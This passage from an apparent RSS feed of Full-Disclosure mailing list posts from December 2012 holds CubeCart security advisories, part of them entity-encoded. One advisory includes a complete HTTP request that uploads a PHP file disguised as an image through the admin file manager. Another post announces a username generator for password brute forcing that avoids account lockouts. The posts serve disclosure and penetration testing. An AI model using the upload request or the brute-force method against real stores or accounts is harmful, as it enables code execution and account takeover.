5;&#110;&#100;&#101;&#120;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#99;&#97;&#116;&#95;&#110;&#97;&#109;&#101;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#97;&#100;&#109;&#105;&#110;&#47;&#112;&#114;&#111;&#100;&#117;&#99;&#116;&#115;&#47;&#105;&#110;&#100;&#101;&#120;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#99;&#97;&#116;&#101;&#103;&#111;&#114;&#121;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#97;&#100;&#109;&#105;&#110;&#47;&#112;&#114;&#111;&#100;&#117;&#99;&#116;&#115;&#47;&#105;&#110;&#100;&#101;&#120;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#110;&#97;&#109;&#101;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#97;&#100;&#109;&#105;&#110;&#47;&#112;&#114;&#111;&#100;&#117;&#99;&#116;&#115;&#47;&#105;&#110;&#100;&#101;&#120;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#111;&#114;&#100;&#101;&#114;&#67;&#111;&#108;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#97;&#100;&#109;&#105;&#110;&#47;&#112;&#114;&#111;&#100;&#117;&#99;&#116;&#115;&#47;&#105;&#110;&#100;&#101;&#120;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#111;&#114;&#100;&#101;&#114;&#68;&#105;&#114;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#97;&#100;&#109;&#105;&#110;&#47;&#112;&#114;&#111;&#100;&#117;&#99;&#116;&#115;&#47;&#105;&#110;&#100;&#101;&#120;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#116;&#97;&#120;&#78;&#97;&#109;&#101;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#97;&#100;&#109;&#105;&#110;&#47;&#112;&#114;&#111;&#100;&#117;&#99;&#116;&#115;&#47;&#108;&#97;&#110;&#103;&#117;&#97;&#103;&#101;&#115;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#112;&#114;&#111;&#100;&#95;&#109;&#97;&#115;&#116;&#101;&#114;&#95;&#105;&#100;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#97;&#100;&#109;&#105;&#110;&#47;&#112;&#114;&#111;&#100;&#117;&#99;&#116;&#115;&#47;&#111;&#112;&#116;&#105;&#111;&#110;&#115;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#97;&#116;&#116;&#114;&#105;&#98;&#117;&#116;&#101;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#97;&#100;&#109;&#105;&#110;&#47;&#112;&#114;&#111;&#100;&#117;&#99;&#116;&#115;&#47;&#111;&#112;&#116;&#105;&#111;&#110;&#115;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#110;&#97;&#109;&#101;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#97;&#100;&#109;&#105;&#110;&#47;&#115;&#101;&#116;&#116;&#105;&#110;&#103;&#115;&#47;&#99;&#117;&#114;&#114;&#101;&#110;&#99;&#121;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#97;&#99;&#116;&#105;&#118;&#101;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#97;&#100;&#109;&#105;&#110;&#47;&#115;&#101;&#116;&#116;&#105;&#110;&#103;&#115;&#47;&#99;&#117;&#114;&#114;&#101;&#110;&#99;&#121;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#110;&#97;&#109;&#101;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#97;&#100;&#109;&#105;&#110;&#47;&#115;&#101;&#116;&#116;&#105;&#110;&#103;&#115;&#47;&#103;&#101;&#111;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#105;&#115;&#111;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#97;&#100;&#109;&#105;&#110;&#47;&#115;&#101;&#116;&#116;&#105;&#110;&#103;&#115;&#47;&#103;&#101;&#111;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#105;&#115;&#111;&#51;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#97;&#100;&#109;&#105;&#110;&#47;&#115;&#101;&#116;&#116;&#105;&#110;&#103;&#115;&#47;&#103;&#101;&#111;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#110;&#97;&#109;&#101;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#97;&#100;&#109;&#105;&#110;&#47;&#115;&#101;&#116;&#116;&#105;&#110;&#103;&#115;&#47;&#103;&#101;&#111;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#110;&#117;&#109;&#99;&#111;&#100;&#101;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#97;&#100;&#109;&#105;&#110;&#47;&#115;&#101;&#116;&#116;&#105;&#110;&#103;&#115;&#47;&#103;&#101;&#111;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#112;&#114;&#105;&#110;&#116;&#97;&#98;&#108;&#101;&#95;&#110;&#97;&#109;&#101;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#97;&#100;&#109;&#105;&#110;&#47;&#115;&#101;&#116;&#116;&#105;&#110;&#103;&#115;&#47;&#116;&#97;&#120;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#116;&#97;&#120;&#78;&#97;&#109;&#101;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#99;&#97;&#114;&#116;&#46;&#112;&#104;&#112;&#63;&#97;&#99;&#116;&#61;&#99;&#97;&#114;&#116;&#9;&#40;&#72;&#84;&#84;&#80;&#32;&#82;&#101;&#102;&#101;&#114;&#101;&#114;&#41;&#10;&#47;&#105;&#110;&#100;&#101;&#120;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#97;&#100;&#100;&#95;&#49;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#105;&#110;&#100;&#101;&#120;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#97;&#100;&#100;&#95;&#50;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#105;&#110;&#100;&#101;&#120;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#99;&#111;&#117;&#110;&#116;&#121;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#105;&#110;&#100;&#101;&#120;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#102;&#105;&#114;&#115;&#116;&#78;&#97;&#109;&#101;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#105;&#110;&#100;&#101;&#120;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#108;&#97;&#115;&#116;&#78;&#97;&#109;&#101;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#105;&#110;&#100;&#101;&#120;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#109;&#111;&#98;&#105;&#108;&#101;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#105;&#110;&#100;&#101;&#120;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#116;&#111;&#119;&#110;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#10;&#10;&#54;&#46;&#32;&#83;&#79;&#76;&#85;&#84;&#73;&#79;&#78;&#10;&#10;&#84;&#104;&#101;&#32;&#67;&#117;&#98;&#101;&#67;&#97;&#114;&#116;&#32;&#51;&#46;&#48;&#46;&#120;&#32;&#118;&#101;&#114;&#115;&#105;&#111;&#110;&#32;&#102;&#97;&#109;&#105;&#108;&#121;&#32;&#105;&#115;&#32;&#110;&#111;&#32;&#108;&#111;&#110;&#103;&#101;&#114;&#32;&#109;&#97;&#105;&#110;&#116;&#97;&#105;&#110;&#101;&#100;&#32;&#98;&#121;&#32;&#116;&#104;&#101;&#32;&#118;&#101;&#110;&#100;&#111;&#114;&#46;&#10;&#85;&#112;&#103;&#114;&#97;&#100;&#101;&#32;&#116;&#111;&#32;&#116;&#104;&#101;&#32;&#99;&#117;&#114;&#114;&#101;&#110;&#116;&#108;&#121;&#32;&#115;&#117;&#112;&#112;&#111;&#114;&#116;&#101;&#100;&#32;&#67;&#117;&#98;&#101;&#67;&#97;&#114;&#116;&#32;&#118;&#101;&#114;&#115;&#105;&#111;&#110;&#32;&#45;&#32;&#53;&#46;&#120;&#46;&#10;&#10;&#10;&#55;&#46;&#32;&#86;&#69;&#78;&#68;&#79;&#82;&#10;&#10;&#67;&#117;&#98;&#101;&#67;&#97;&#114;&#116;&#32;&#68;&#101;&#118;&#101;&#108;&#111;&#112;&#109;&#101;&#110;&#116;&#32;&#84;&#101;&#97;&#109;&#10;&#104;&#116;&#116;&#112;&#58;&#47;&#99;&#97;&#114;&#116;&#46;&#99;&#111;&#109;&#47;&#10;&#10;&#10;&#56;&#46;&#32;&#67;&#82;&#69;&#68;&#73;&#84;&#10;&#10;&#65;&#117;&#110;&#103;&#32;&#75;&#104;&#97;&#110;&#116;&#44;&#32;&#91;&#10;&#10;&#10;&#57;&#46;&#32;&#68;&#73;&#83;&#67;&#76;&#79;&#83;&#85;&#82;&#69;&#32;&#84;&#73;&#77;&#69;&#45;&#76;&#73;&#78;&#69;&#10;&#10;&#50;&#48;&#49;&#50;&#45;&#48;&#50;&#45;&#49;&#48;&#58;&#32;&#67;&#117;&#98;&#101;&#67;&#97;&#114;&#116;&#32;&#51;&#46;&#48;&#46;&#120;&#32;&#105;&#110;&#32;&#69;&#110;&#100;&#45;&#111;&#102;&#45;&#83;&#117;&#112;&#112;&#111;&#114;&#116;&#47;&#77;&#97;&#105;&#110;&#116;&#101;&#110;&#97;&#110;&#99;&#101;&#32;&#99;&#105;&#114;&#99;&#108;&#101;&#10;&#50;&#48;&#49;&#50;&#45;&#49;&#50;&#45;&#50;&#50;&#58;&#32;&#86;&#117;&#108;&#110;&#101;&#114;&#97;&#98;&#105;&#108;&#105;&#116;&#121;&#32;&#100;&#105;&#115;&#99;&#108;&#111;&#115;&#101;&#100;&#10;&#10;&#10;&#49;&#48;&#46;&#32;&#82;&#69;&#70;&#69;&#82;&#69;&#78;&#67;&#69;&#83;&#10;&#10;&#79;&#114;&#105;&#103;&#105;&#110;&#97;&#108;&#32;&#65;&#100;&#118;&#105;&#115;&#111;&#114;&#121;&#32;&#85;&#82;&#76;&#58;&#10;&#91;&#10;&#67;&#117;&#98;&#101;&#67;&#97;&#114;&#116;&#32;&#72;&#111;&#109;&#101;&#32;&#80;&#97;&#103;&#101;&#58;&#32;&#91;&#10;&#10;&#9;&#10;&#35;&#121;&#101;&#104;&#103;&#32;&#91;&#50;&#48;&#49;&#50;&#45;&#49;&#50;&#45;&#50;&#50;&#93;&#10;&#10;&#45;&#45;&#45;&#45;&#45;&#45;&#45;&#45;&#45;&#45;&#45;&#45;&#45;&#45;&#45;&#45;&#45;&#45;&#45;&#45;&#45;&#45;&#45;&#45;&#45;&#45;&#45;&#45;&#45;&#45;&#45;&#45;&#45;&#10;&#66;&#101;&#115;&#116;&#32;&#114;&#101;&#103;&#97;&#114;&#100;&#115;&#44;&#10;&#89;&#71;&#78;&#32;&#69;&#116;&#104;&#105;&#99;&#97;&#108;&#32;&#72;&#97;&#99;&#107;&#101;&#114;&#32;&#71;&#114;&#111;&#117;&#112;&#10;&#89;&#97;&#110;&#103;&#111;&#110;&#44;&#32;&#77;&#121;&#97;&#110;&#109;&#97;&#114;&#10;&#91;&#10;&#79;&#117;&#114;&#32;&#76;&#97;&#98;&#32;&#124;&#32;&#91;&#10;&#79;&#117;&#114;&#32;&#68;&#105;&#114;&#101;&#99;&#116;&#111;&#114;&#121;&#32;&#124;&#32;&#91;&#10;&#10;&#95;&#95;&#95;&#95;&#95;&#95;&#95;&#95;&#95;&#95;&#95;&#95;&#95;&#95;&#95;&#95;&#95;&#95;&#95;&#95;&#95;&#95;&#95;&#95;&#95;&#95;&#95;&#95;&#95;&#95;&#95;&#95;&#95;&#95;&#95;&#95;&#95;&#95;&#95;&#95;&#95;&#95;&#95;&#95;&#95;&#95;&#95;&#10;&#70;&#117;&#108;&#108;&#45;&#68;&#105;&#115;&#99;&#108;&#111;&#115;&#117;&#114;&#101;&#32;&#45;&#32;&#87;&#101;&#32;&#98;&#101;&#108;&#105;&#101;&#118;&#101;&#32;&#105;&#110;&#32;&#105;&#116;&#46;&#10;&#67;&#104;&#97;&#114;&#116;&#101;&#114;&#58;&#32;&#91;&#10;&#72;&#111;&#115;&#116;&#101;&#100;&#32;&#97;&#110;&#100;&#32;&#115;&#112;&#111;&#110;&#115;&#111;&#114;&#101;&#100;&#32;&#98;&#121;&#32;&#83;&#101;&#99;&#117;&#110;&#105;&#97;&#32;&#45;&#32;&#91;&#93;</a>]]></description>
            <dc:creator>YGN Ethical Hacker Group</dc:creator>
            <category>Full-Disclosure</category>
            <pubDate>Sun, 23 Dec 2012 05:47:38 +0800</pubDate>
        </item>
        <item>
            <guid>http://choon.net/forum/read.php?23,1693476,1693476#msg-1693476</guid>
            <title>[Full-disclosure] CubeCart 3.0.20 (3.0.x) and lower | Arbitrary File Upload (no replies)</title>
            <link>http://choon.net/forum/read.php?23,1693476,1693476#msg-1693476</link>
            <description><![CDATA[ 1. OVERVIEW<br />
<br />
CubeCart 3.0.20 and lower versions are vulnerable to Arbitrary File Upload.<br />
<br />
<br />
2. BACKGROUND<br />
<br />
CubeCart is an &quot;out of the box&quot; ecommerce shopping cart software<br />
solution which has been written to run on servers that have PHP &amp;<br />
MySQL support. With CubeCart you can quickly setup a powerful online<br />
store which can be used to sell digital or tangible products to new<br />
and existing customers all over the world.<br />
<br />
<br />
3. VULNERABILITY DESCRIPTION<br />
<br />
CubeCart 3.0.20 and lower versions contain a flaw related to the<br />
/admin/filemanager/upload.php script's failure to properly validate<br />
uploaded files. This may allow a remote attacker to upload arbitrary<br />
files and execute arbitrary code via a request to the 'atm-regen'<br />
parameter.<br />
<br />
<br />
4. VERSIONS AFFECTED<br />
<br />
3.0.20 and lower (aka 3.0.x family)<br />
<br />
<br />
5. PROOF-OF-CONCEPT/EXPLOIT<br />
<br />
Set content type to image/jpeg and upload.<br />
Uploaded files are stored at images/uploads.<br />
<br />
<br />
/////////////////////////////////////////////////////////////////////<br />
POST /cube/admin/filemanager/upload.php HTTP/1.1<br />
Host:localhost<br />
Referer: [<a href="http://localhost/cube/admin/filemanager/upload.php?custom=1&amp;redir=0"  rel="nofollow">localhost</a>]<br />
Cookie: ccSIDb4c410adddf67168ce2ac0e2807326f8=f2c0bc69b813778a644b76c2b40c7ce0;<br />
Content-Type: multipart/form-data;<br />
boundary=---------------------------24464570528145<br />
Content-Length: 29<br />
<br />
-----------------------------24464570528145<br />
Content-Disposition: form-data; name=&quot;FCKeditor_File&quot;; filename=&quot;cmd.php&quot;<br />
Content-Type: image/jpeg<br />
<br />
&lt;?php info();?&gt;<br />
<br />
-----------------------------24464570528145<br />
Content-Disposition: form-data; name=&quot;submit&quot;<br />
<br />
Upload Image<br />
-----------------------------24464570528145<br />
Content-Disposition: form-data; name=&quot;redir&quot;<br />
<br />
0<br />
-----------------------------24464570528145<br />
Content-Disposition: form-data; name=&quot;custom&quot;<br />
<br />
1<br />
-----------------------------24464570528145--<br />
<br />
///////////////////////////////////////////////////////////////<br />
<br />
<br />
6. SOLUTION<br />
<br />
The CubeCart 3.0.x version family is no longer maintained by the vendor.<br />
Upgrade to the currently supported CubeCart version - 5.x.<br />
<br />
<br />
7. VENDOR<br />
<br />
CubeCart Development Team<br />
http:/cart.com/<br />
<br />
<br />
8. CREDIT<br />
<br />
Aung Khant, [<a href="http://yehg.net"  rel="nofollow">yehg.net</a>], YGN Ethical Hacker Group, Myanmar.<br />
<br />
<br />
9. DISCLOSURE TIME-LINE<br />
<br />
2012-02-10: CubeCart 3.0.x in End-of-Support/Maintenance circle<br />
2012-12-22: Vulnerability disclosed<br />
<br />
<br />
10. REFERENCES<br />
<br />
Original Advisory URL:<br />
[<a href="http://yehg.net/lab/pr0js/advisories/%5Bcubecart_3.0.20_3.0x%5D_arbitrary_file_upload"  rel="nofollow">yehg.net</a>]<br />
CubeCart Home Page: [<a href="http://cubecart.com/"  rel="nofollow">cubecart.com</a>]<br />
<br />
	<br />
#yehg [2012-12-22]<br />
<br />
---------------------------------<br />
Best regards,<br />
YGN Ethical Hacker Group<br />
Yangon, Myanmar<br />
[<a href="http://yehg.net"  rel="nofollow">yehg.net</a>]<br />
Our Lab | [<a href="http://yehg.net/lab"  rel="nofollow">yehg.net</a>]<br />
Our Directory | [<a href="http://yehg.net/hwd"  rel="nofollow">yehg.net</a>]<br />
<br />
_______________________________________________<br />
Full-Disclosure - We believe in it.<br />
Charter: [<a href="http://lists.grok.org.uk/full-disclosure-charter.html"  rel="nofollow">lists.grok.org.uk</a>]<br />
Hosted and sponsored by Secunia - [<a href="http://secunia.com/"  rel="nofollow">secunia.com</a>]]]></description>
            <dc:creator>YGN Ethical Hacker Group</dc:creator>
            <category>Full-Disclosure</category>
            <pubDate>Sun, 23 Dec 2012 05:32:31 +0800</pubDate>
        </item>
        <item>
            <guid>http://choon.net/forum/read.php?23,1691564,1691564#msg-1691564</guid>
            <title>[Full-disclosure] New Tool: Username Anarchy (no replies)</title>
            <link>http://choon.net/forum/read.php?23,1691564,1691564#msg-1691564</link>
            <description><![CDATA[ Hi FD,<br />
<br />
Have you ever discovered a user's real name on a pentest and then had to make a list of potential<br />
usernames so you could bruteforce some passwords, Apache home directories, etc? It sucked didn't<br />
it..? With username-anarchy you can generate usernames without tears.<br />
<br />
Feedback is welcome.<br />
<br />
<br />
<br />
<br />
Username Anarchy<br />
======================================<br />
<br />
* Version: 0.2 (November 2012)<br />
* Author: urbanadventurer (Andrew Horton)<br />
* Homepage: [<a href="http://www.morningstarsecurity.com/research/username-anarchy"  rel="nofollow">www.morningstarsecurity.com</a>]<br />
* Download: [<a href="https://github.com/urbanadventurer/username-anarchy/archive/master.zip"  rel="nofollow">github.com</a>]<br />
<br />
Description<br />
------------<br />
Tools for generating usernames when penetration testing. *Usernames are half the password brute<br />
force problem.*<br />
<br />
This is useful for user account/password brute force guessing and username enumeration when<br />
usernames are based on the users' names. By attempting a few weak passwords across a large set of<br />
user accounts, user account lockout thresholds can be avoided.<br />
<br />
Users' names can be identified through a variety of methods:<br />
* Web scraping employee names from LinkedIn, Facebook, and other social networks.<br />
* Extracting metadata from document types such as PDF, Word, Excel, etc. This can be performed with<br />
FOCA.<br />
<br />
Common aliases, or self chosen usernames, from forums are also included.<br />
<br />
<br />
Features<br />
--------<br />
<br />
* Plugin architecture for username formats<br />
* Format string style username format definitions<br />
* Substitutions. e.g. when only a first initial and lastname is known (LinkedIn lists users like<br />
this), it will attempt all possible first names<br />
* Country databases of common first and last names from Familypedia and PublicProfiler<br />
* Has the Facebook common first and lastnames lists<br />
<br />
<br />
Extras<br />
------<br />
<br />
* Common forum usernames, ordered by popularity<br />
<br />
Usage<br />
-----<br />
Username Anarchy is a command line tool.<br />
<br />
    Usage: ./username-anarchy [OPTIONS]... [firstname|first last|first middle last]<br />
    Version: 0.2<br />
<br />
    NAMES<br />
    --input-file, -i=FILE           Input list of names. Can be CSV or TAB delimited.<br />
                                        Valid column headings are: firstinitial,firstname,<br />
                                        lastinitial,lastname,middleinitial,middlename<br />
    --auto, -a                      Automatically generate names from a country or other lists.<br />
    --country COUNTRY, -c           COUNTRY can be one of the following datasets:<br />
                                        PublicProfiler:<br />
                                        argentina, austria, belgium, canada, china, denmark, france,<br />
germany,<br />
                                        hungary, india, ireland, italy, luxembourg, netherlands,<br />
newzealand,<br />
                                        norway, poland, serbia, slovenia, spain, sweden,<br />
switzerland, uk, us<br />
                                        Other:<br />
                                        Facebook - uses the Facebook top 10,000 first and last names<br />
    --given-names=FILE              Dictionary of given names<br />
    --family-names=FILE             Dictionary of family names<br />
    --substitute, -s=STATE          Control name substitutions.<br />
                                Valid values are 'on' and 'off'. Default: off<br />
                                Can substitute any part of a name not available.<br />
    --max-substitutions, -m=NUM     Limit quantity of substitutions per plugin.<br />
                                Default: -1 (Unlimited)<br />
<br />
    USERNAME FORMAT<br />
    --list-formats, -l              List format plugins<br />
    --select-format, -f=LIST        Select format plugins by name. Comma delimited list<br />
    --recognise, -r=USERNAME        Recognise which format is in use for a username. This<br />
                                        uses the Facebook dataset. Use verbose mode to show progress.<br />
<br />
    MISC<br />
    --verbose, -v                   Display plugin format comments in output and displays last name<br />
searches<br />
                                in plugin format recogniser<br />
    --help, -h                      This help<br />
<br />
<br />
<br />
Example Usage<br />
-------------<br />
### You know the name of a user but not the username format<br />
<br />
    ./username-anarchy anna key<br />
    anna<br />
    annakey<br />
    anna.key<br />
    annakey<br />
    annak<br />
    a.key<br />
    akey<br />
    kanna<br />
    k.anna<br />
    ...<br />
<br />
<br />
### You know the username format and names of users<br />
<br />
    ./username-anarchy --input-file ./test-names.txt  --select-format first.last<br />
    andrew.horton<br />
    jim.vongrippenvud<br />
    peter.otoole<br />
<br />
<br />
### You know the server is in France<br />
Note that -a or --auto is required when you do not specify any input names.<br />
<br />
    ./username-anarchy --country france --auto<br />
    martin<br />
    bernard<br />
    thomas<br />
    durand<br />
    richard<br />
    robert<br />
    petit<br />
    moreau<br />
    dubois<br />
    simon<br />
    martinsmith<br />
    martinjohnson<br />
    ...<br />
<br />
### List username format plugins<br />
<br />
    ./username-anarchy --list-formats<br />
    Plugin name             Example<br />
    --------------------------------------------------------------------------------<br />
    first                   anna<br />
    firstlast               annakey<br />
    first.last              anna.key<br />
    firstlast[8]            annakey<br />
    firstl                  annak<br />
    f.last                  a.key<br />
    flast                   akey<br />
    lfirst                  kanna<br />
    l.first                 k.anna<br />
    lastf                   keya<br />
    last                    key<br />
    last.f                  key.a<br />
    last.first              key.anna<br />
    FLast                   AKey<br />
    first1                  anna0,anna1,anna2<br />
    fl                      ak<br />
    fmlast                  abkey<br />
    firstmiddlelast         annaboomkey<br />
    fml                     abk<br />
    FL                      AK<br />
    FirstLast               AnnaKey<br />
    First.Last              Anna.Key<br />
    Last                    Key<br />
    FML                     ABK<br />
<br />
<br />
### Automatically recognise the username format in use<br />
    ./username-anarchy --recognise j.smith<br />
    Recognising j.smith. This can take a while.<br />
    Username format j.smith recognised. Plugin name: f.last<br />
<br />
<br />
<br />
Input Files<br />
-----------<br />
To generate usernames for more than one user account you must provide the names in a text file.<br />
This can be either TAB or CSV delimited.<br />
<br />
### Example 1<br />
    Firstname,Lastname<br />
    Andrew,Horton<br />
    Jim, von Grippenvud<br />
    Peter,O'Toole<br />
<br />
### Example 2<br />
LinkedIn often shows the firstname and last initial<br />
<br />
    firstname,lastinitial<br />
    andrew,h<br />
    foo,b<br />
<br />
### Example 3<br />
Mixed set of names<br />
<br />
    firstname,firstinitial,middleinitial,lastname,lastinitial<br />
    andrew,,,horton,<br />
    jim,,,,v<br />
    ,p,,o'toole,<br />
   <br />
Custom Plugins<br />
--------------<br />
### Command line Plugins<br />
Define a custom plugin format using either the ABK or format string format.<br />
Specify the username format with -F or --format<br />
<br />
#### Example 1<br />
   <br />
    ./username-anarchy -F &quot;v-annakey&quot; andrew horton<br />
    v-andrewhorton<br />
<br />
#### Example 2<br />
<br />
    ./username-anarchy -F &quot;v-%f%l&quot; -a -C poland<br />
    v-nowaksmith<br />
    v-nowakjohnson<br />
    v-nowakjones<br />
    v-nowakwilliams<br />
    v-nowakbrown<br />
    v-nowaklee<br />
    v-nowakkhan<br />
    v-nowaksingh<br />
    v-nowakkumar<br />
    v-nowakmiller<br />
    ...<br />
<br />
### Writing Plugins<br />
You can add plugins to username anarchy by defining them in format-plugins.rb<br />
<br />
This example uses the ABK format.<br />
<br />
    Plugin.define &quot;last.first&quot; do<br />
        def generate(n)<br />
            n.format_anna(&quot;key.anna&quot;)<br />
        end<br />
    end<br />
<br />
This example uses the format string format.<br />
<br />
    Plugin.define &quot;first&quot; do<br />
        def generate(n)<br />
            n.format(&quot;%f&quot;)<br />
        end<br />
    end<br />
<br />
<br />
### Format Strings<br />
Username Anarchy provides a method of defining a username format with format strings.<br />
<br />
* %F - Firstname<br />
* %M - Middlename<br />
* %L - Lastname<br />
* %f - firstname<br />
* %m - middlename<br />
* %l - lastname<br />
* %i.f - first initial<br />
* %i.m - middle initial<br />
* %i.l - last initial<br />
* %i.F - First initial<br />
* %i.M - Middle initial<br />
* %i.L - Last initial<br />
* %D - Digit range 0..9<br />
* %DD - Digit range 00..99<br />
<br />
<br />
### ABK Format<br />
Username Anarchy provides a method of defining a username format with ABK format which translates<br />
to format strings.<br />
<br />
* Anna - %F<br />
* Boom - %M<br />
* Key - %L<br />
* anna - %f<br />
* boom - %m<br />
* key - %l<br />
* A - %i.F<br />
* B - %i.M<br />
* K - %i.L<br />
* a - %i.f<br />
* b - %i.m<br />
* k - %i.l<br />
<br />
<br />
Forum Usernames<br />
---------------<br />
The forum-names folder contains:<br />
* common-forum-names.csv - A CSV file with forum names and the frequency they appeared with<br />
* common-forum-names-top10k.txt - The top 10,000 forum names<br />
* common-forum-names.txt - 1,774,313 forum names<br />
* phpbb-scraper.rb - a web scraper for usernames on PHPbb forums<br />
<br />
<br />
<br />
Name Resources<br />
--------------<br />
<br />
### Names<br />
* [<a href="http://worldnames.publicprofiler.org/SearchArea.aspx"  rel="nofollow">worldnames.publicprofiler.org</a>] Some common countries. Top 10 surnames and<br />
forenames<br />
* [<a href="https://secure.wikimedia.org/wikipedia/en/wiki/List_of_most_popular_given_names"  rel="nofollow">secure.wikimedia.org</a>]<br />
* [<a href="http://www.babynamefacts.com/popularnames/countries.php?country=NZD"  rel="nofollow">www.babynamefacts.com</a>] top 100 baby names per country<br />
* [<a href="https://secure.wikimedia.org/wikipedia/en/wiki/List_of_most_common_surnames_in_Oceania"  rel="nofollow">secure.wikimedia.org</a>]<br />
<br />
### Name Parsing:<br />
* [<a href="https://secure.wikimedia.org/wikipedia/en/wiki/Capitalization"  rel="nofollow">secure.wikimedia.org</a>]<br />
* [<a href="http://cpansearch.perl.org/src/KIMRYAN/Lingua-EN-NameParse-1.28/lib/Lingua/EN/NameParse.pm"  rel="nofollow">cpansearch.perl.org</a>]<br />
* [<a href="http://search.cpan.org/~summer/Lingua-EN-NameCase/NameCase.pm"  rel="nofollow">search.cpan.org</a>]<br />
<br />
<br />
<br />
_______________________________________________<br />
Full-Disclosure - We believe in it.<br />
Charter: [<a href="http://lists.grok.org.uk/full-disclosure-charter.html"  rel="nofollow">lists.grok.org.uk</a>]<br />
Hosted and sponsored by Secunia - [<a href="http://secunia.com/"  rel="nofollow">secunia.com</a>]]]></description>
            <dc:creator>Andrew Horton</dc:creator>
            <category>Full-Disclosure</category>
            <pubDate>Sat, 22 Dec 2012 17:15:27 +0800</pubDate>
        </item>
        <item>
            <guid>http://choon.net/forum/read.php?23,1689204,1689204#msg-1689204</guid>
            <title>[Full-disclosure] Competitively priced drop box for pentesters (1 reply)</title>
            <link>http://choon.net/forum/read.php?23,1689204,1689204#msg-1689204</link>
            <description><![CDATA[ [<a href="https://twitter.com/demyosec/status/282194259820548096"  rel="nofollow">twitter.com</a>]<br />
<br />
-- <br />
Almantas Kakareka, CISSP, GSNA, GSEC, CEH<br />
CTO<br />
Demyo, Inc.<br />
Miami, FL, USA<br />
Cell: +1 201 665 6666<br />
Desk: +1 786 203 3948<br />
Email: <a href="mailto:&#97;&#108;&#109;&#97;&#122;&#64;&#100;&#101;&#109;&#121;&#111;&#46;&#99;&#111;&#109;">&#97;&#108;&#109;&#97;&#122;&#64;&#100;&#101;&#109;&#121;&#111;&#46;&#99;&#111;&#109;</a><br />
Twitter: @DemyoSec &lt;[<a href="https://twitter.com/#!/demyosec&gt"  rel="nofollow">twitter.com</a>];<br />
Web: www.demyo.com<br />
_______________________________________________<br />
Full-Disclosure - We believe in it.<br />
Charter: [<a href="http://lists.grok.org.uk/full-disclosure-charter.html"  rel="nofollow">lists.grok.org.uk</a>]<br />
Hosted and sponsored by Secunia - [<a href="http://secunia.com/"  rel="nofollow">secunia.com</a>]]]></description>
            <dc:creator>Almaz</dc:creator>
            <category>Full-Disclosure</category>
            <pubDate>Sat, 22 Dec 2012 15:45:09 +0800</pubDate>
        </item>
        <item>
            <guid>http://choon.net/forum/read.php?23,1688479,1688479#msg-1688479</guid>
            <title>Re: [Full-disclosure] [OSVDB Mods] Fwd: Internet Explorer Stack Exhaustion -&gt; Flag [MSIE9] (fwd) (no replies)</title>
            <link>http://choon.net/forum/read.php?23,1688479,1688479#msg-1688479</link>
            <description><![CDATA[ ---------- Forwarded message ----------<br />
From: security curmudgeon &lt;jericho@attrition.org&gt;<br />
